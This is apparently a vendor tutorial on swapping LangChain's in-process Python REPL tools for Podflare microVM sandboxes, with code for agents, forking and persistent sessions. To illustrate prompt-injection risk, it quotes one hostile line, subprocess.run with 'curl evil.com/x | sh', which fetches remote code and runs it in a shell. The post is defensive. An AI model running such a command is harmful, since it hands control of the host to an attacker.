LangChain’s Tool primitive is clean, but the default code-execution tools (PythonREPLTool, PythonAstREPLTool) run inside your own Python process. That’s fine for development. For production agents running LLM-generated code, it’s a foot-gun — one prompt injection away from os.system-ing your server.
This post walks through replacing those in-process tools with a hardware-isolated Podflare sandbox, using LangChain’s DynamicStructuredTool. Full code, runs today, works with LangGraph, works with the current LangChain agent executor API.
Install
pip install langchain langchain-openai podflare export OPENAI_API_KEY=sk-... export PODFLARE_API_KEY=pf_live_...
The tool, using Podflare’s built-in helper
Podflare ships a LangChain adapter so you don’t have to write the StructuredTool boilerplate yourself. Import and go:
from podflare import Sandbox
from podflare.langchain import PodflareTool
sb = Sandbox()
run_python = PodflareTool(
sandbox=sb,
name="run_python",
description=(
"Execute Python code in a persistent REPL. Variables, "
"imports, and file state carry across calls. Returns "
"stdout and stderr from the execution."
),
)PodflareTool is a BaseTool-shaped wrapper that takes a string argument code and returns the sandbox’s stdout + stderr. Drop it into any LangChain agent like any other tool.
Wire it into an agent
from langchain_openai import ChatOpenAI
from langchain.agents import AgentExecutor, create_openai_tools_agent
from langchain_core.prompts import ChatPromptTemplate
llm = ChatOpenAI(model="gpt-5", temperature=0)
prompt = ChatPromptTemplate.from_messages([
("system",
"You are a senior data scientist. You have access to a Python "
"REPL. State persists across calls — variables and imports "
"stick. Prefer using pandas + numpy over writing loops."),
("human", "{input}"),
("placeholder", "{agent_scratchpad}"),
])
agent = create_openai_tools_agent(llm, [run_python], prompt)
executor = AgentExecutor(agent=agent, tools=[run_python], verbose=True)
result = executor.invoke({
"input":
"Fetch the last 10 days of SPY close prices from Yahoo "
"Finance. Compute daily returns. Tell me the standard "
"deviation and whether it's higher than the 30-day average."
})
print(result["output"])
sb.close()The agent will do roughly three tool calls: fetch the data, compute returns, compute stats. Between calls, the Python process stays alive inside the same Podflare sandbox, so pandas, numpy, the fetched data, and intermediate variables all persist in globals().
Why this is more than a convenience
Three concrete wins over the default LangChain REPL tools:
1. Isolation — the model can’t hurt you
PythonREPLTool runs in your process. If the model gets prompt-injected into running subprocess.run("curl evil.com/x | sh"), that runs on your machine. With a Podflare sandbox, it runs in a disposable Podflare Pod microVM that can’t reach your host. See Why Docker isn’t enough for the full argument.
2. Real pip install
The model can run !pip install scikit-learn inline (or declare it as part of the tool call) and have the library available on the next turn. Your host Python environment stays clean — all installs happen inside the sandbox.
3. Fork for parallel hypotheses
Tree-of-thought, multi-attempt code synthesis, and "try 5 approaches and take the best" patterns are one line on Podflare:
children = parent.fork(n=5) # ~80ms server-side
results = [c.run_code(strategy) for c, strategy in zip(children, strategies)]
winner = pick_best(results)
parent.merge_into(winner) # commit winner's state back to parent
for c in children:
c.close()LangChain’s default REPL tool has no fork primitive — you’d have to spin up N processes and lose all the shared setup cost. Podflare’s snapshot-based fork preserves the full Python state (imports, open files, loaded DataFrames) in every child.
LangGraph-style long-running sessions
For LangGraph agents that run for hours or days and you want to resume later with the same Python state, mark the sandbox persistent:
# Day 1: create + load expensive state
sb = Sandbox(persistent=True)
sb.run_code("""
import pandas as pd
df = pd.read_parquet('/data/year.parquet') # 2 GB
model = train_model(df)
""")
space_id = sb.space_id
sb.idle() # freezes full VM memory to disk
# Day 2: resume — `df` and `model` are still in memory
sb = Sandbox.resume(space_id)
sb.run_code("model.predict(df.sample(10))") # no retrainingWhat about LangGraph’s built-in state?
LangGraph’s checkpointer handles message history across runs. It doesn’t handle live Python process state — that’s where Podflare Spaces fits. They compose: use LangGraph checkpoints for the conversational state, and a Podflare persistent Sandbox for the execution state. Neither replaces the other.
Performance
For chatty agents that make many small exec calls per turn, the hot-exec latency is what matters — and Podflare is ~46 ms p50 per call on an already-live sandbox. Compared with spinning up a Docker container per LangChain tool call (500–2000 ms), it’s an order of magnitude faster and less error-prone.
Try it
Sign up for a free Podflare account ($200 starter credit). The full working LangChain example is in PodFlare-ai/demo. Takes under a minute to go from a clean pip env to a LangChain agent running real code in a microVM.